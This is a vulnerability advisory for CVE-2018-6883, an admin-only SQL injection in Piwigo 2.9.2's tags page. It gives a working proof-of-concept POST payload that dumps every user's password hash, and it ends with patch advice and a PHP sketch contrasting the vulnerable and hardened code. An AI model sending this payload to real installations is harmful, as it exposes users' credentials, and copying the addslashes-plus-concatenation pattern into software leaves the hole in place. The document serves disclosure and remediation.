- Document Title:
- ===============
- Piwigo v2.9.2 - SQL injection in administration panel
- CVE-ID:
- =======
- CVE-2018-6883
- Release Date:
- =============
- 2018-02-11
- References:
- =============
- https://github.com/Piwigo/Piwigo/issues/839
- Common Vulnerability Scoring System:
- ====================================
- 3.8 (AV:N/AC:H/Au:S/C:C/I:N/A:N/E:F/RL:TF/RC:UC/CDP:N/TD:ND/CR:ND/IR:ND/AR:ND) (CVSS v2 temporal score; the base score for the same vector is 4.9)
- Vulnerability Class:
- ====================
- SQL injection
- Product & Service Introduction:
- ===============================
- Piwigo is photo gallery software for the web, built by an active community of users and developers. Freely available extensions can be used to customize Piwigo. It is written in PHP using MySQL as a database server.
- Abstract Advisory Information:
- ==============================
- An SQL injection has been discovered in the administration panel of Piwigo (version 2.9.2).
- Vulnerability Disclosure Timeline:
- ==================================
- 2018-02-10: Requested CVE ID
- 2018-02-11: Informed vendor
- 2018-02-21: Acknowledged by vendor
- 2018-02-22: Patch created by vendor
- Discovery Status:
- =================
- Fixed
- Affected Product(s):
- ====================
- Piwigo
- Product: Piwigo - Content Management System (Web-Application) 2.9.2
- Exploitation Technique:
- =======================
- Remote
- Severity Level:
- ===============
- Low
- Authentication Type:
- ====================
- Requires admin privileges
- User Interaction:
- =================
- Low User Interaction
- Disclosure Type:
- ================
- Independent Security Research
- Technical Details & Description:
- ================================
- An SQL injection has been discovered in the administration panel of Piwigo v2.9.2. The vulnerability allows remote attackers who are authenticated as administrator to inject SQL code into a query. Because the query's result set is rendered in the response, this can result in full disclosure of the database contents.
- The SQL injection was found in admin/tags.php and is triggered by injecting SQL into the 'tags' POST array. Each value is only passed through addslashes() and is then concatenated into the SQL string as part of an unquoted, comma-joined list inside parentheses (the PoC payload's leading '-1)' closes that parenthesis). addslashes() only escapes quote and backslash characters, and a payload for a numeric context needs none, so the escaping has no effect. Furthermore, the result set is part of the page output, so the injected query can disclose data from other tables in the database.
- The POST variables 'edit_list' and 'merge_list' are vulnerable to the same attack; however, no exploit exists to disclose information through these variables. A separate vulnerability report was made for 'edit_list' (CVE-2017-16893).
- The security risk of the vulnerability is estimated as low with a CVSS score of 3.8. Exploitation of the web vulnerability requires the attacker to be authenticated as administrator.
- Request Method(s):
- [+] POST
- Vulnerable File(s):
- [+] admin/tags.php
- Vulnerable Parameter(s):
- [+] edit_list
- [+] merge_list
- [+] tags
- Affected Module(s):
- [+] Backend
- Proof of Concept (PoC):
- =======================
- Once the attacker has obtained an administrator session, the attacker can send a specially crafted POST request to /admin.php?page=tags as follows:
- POST http://localhost/piwigo/admin.php?page=tags HTTP/1.0
- Content-Type: application/x-www-form-urlencoded
- Cookie: <ADMIN COOKIE>
- pwg_token=<TOKEN>&tags%5B%5D=-1)%20UNION%20(SELECT%20password%20FROM%20piwigo_users&selectAction=delete&confirm_deletion=1&delete=
- The 'tags[]' value URL-decodes to '-1) UNION (SELECT password FROM piwigo_users': the leading '-1)' closes the application's own parenthesised id list, and the UNION appends every row of the password column to the result set that the page echoes back. The result page will therefore list the password hashes of all users at this line:
- "The following 4 keywords have been deleted : XXXX, XXXX, XXXX, XXXX"
- Solution - Fix & Patch:
- =======================
- Introduce further sanitization of the $_POST['edit_list'], $_POST['merge_list'] and $_POST['tags'] variables by limiting each to an array of integers only. Non-integer elements should cause the request to be rejected rather than escaped, since quote escaping does not protect a numeric context.
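As an added example (not Piwigo's code and not the vendor's patch), the following PHP contrasts the pre-patch pattern described in the technical details above, addslashes() on each element followed by concatenation into an unquoted list, with the integer-only restriction proposed in this section. The query shape is an assumption inferred from the PoC payload's leading '-1)'; the table names piwigo_tags and piwigo_users are the ones the PoC references; the function names and the sample inputs are hypothetical and constructed for the illustration.

```php
<?php
// Added illustration, not Piwigo's code: models the pre-patch and hardened
// handling of the 'tags' POST array described in the advisory.
// Assumptions: the query shape is inferred from the PoC payload; table names
// are those used in the PoC; function names are hypothetical.

declare(strict_types=1);

/** Pre-patch pattern: addslashes() on each value, then an unquoted IN (...) list. */
function build_tag_query_vulnerable(array $tags): string
{
    $escaped = array_map('addslashes', $tags);
    return 'SELECT name FROM piwigo_tags WHERE id IN (' . implode(',', $escaped) . ')';
}

/**
 * Hardened pattern: accept only a non-empty array of integer IDs.
 * Anything else is rejected outright rather than "escaped", because
 * escaping cannot help in a numeric SQL context.
 * Returns null when the input is not a list of integer IDs.
 */
function validate_id_list($value): ?array
{
    if (!is_array($value) || $value === []) {
        return null;
    }
    $ids = [];
    foreach ($value as $item) {
        // ctype_digit() accepts only a non-empty string of ASCII digits:
        // no sign, no whitespace, no parentheses, no SQL keywords.
        if (!is_string($item) || !ctype_digit($item)) {
            return null;
        }
        $ids[] = (int) $item;
    }
    return $ids;
}

/** Builds the same query as above, but only from a validated integer list. */
function build_tag_query_fixed(array $tags): ?string
{
    $ids = validate_id_list($tags);
    if ($ids === null) {
        return null; // caller should fail the request (e.g. HTTP 400), not run a query
    }
    return 'SELECT name FROM piwigo_tags WHERE id IN (' . implode(',', $ids) . ')';
}

// Constructed input: the PoC's tags[] value after URL decoding, plus a benign list.
$injected = ['-1) UNION (SELECT password FROM piwigo_users'];
$benign   = ['4', '17'];

// addslashes() leaves the payload untouched: it contains no quote or backslash,
// which is exactly why it was not an effective control here.
if (addslashes($injected[0]) !== $injected[0]) {
    throw new RuntimeException('unexpected: addslashes() altered the payload');
}

echo "vulnerable builder, injected input:\n  ", build_tag_query_vulnerable($injected), "\n";
echo "fixed builder, benign input:\n  ", build_tag_query_fixed($benign), "\n";
echo "fixed builder, injected input:\n  ";
var_dump(build_tag_query_fixed($injected));
```

Running it shows the vulnerable builder emitting the UNION query from the PoC unchanged, while the hardened builder returns null for the same input and only produces a query for the all-digit list. Rejecting the request is preferable to coercing with intval(), which would silently turn the payload into -1 and hide the attack attempt from the logs.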
- Security Risk:
- ==============
- The security risk of this SQL injection, which requires administrator privileges, is estimated to be low (CVSS score 3.8).
- Credits & Authors:
- ==================
- Jorrit Kronjee <jorrit at wafel dot org>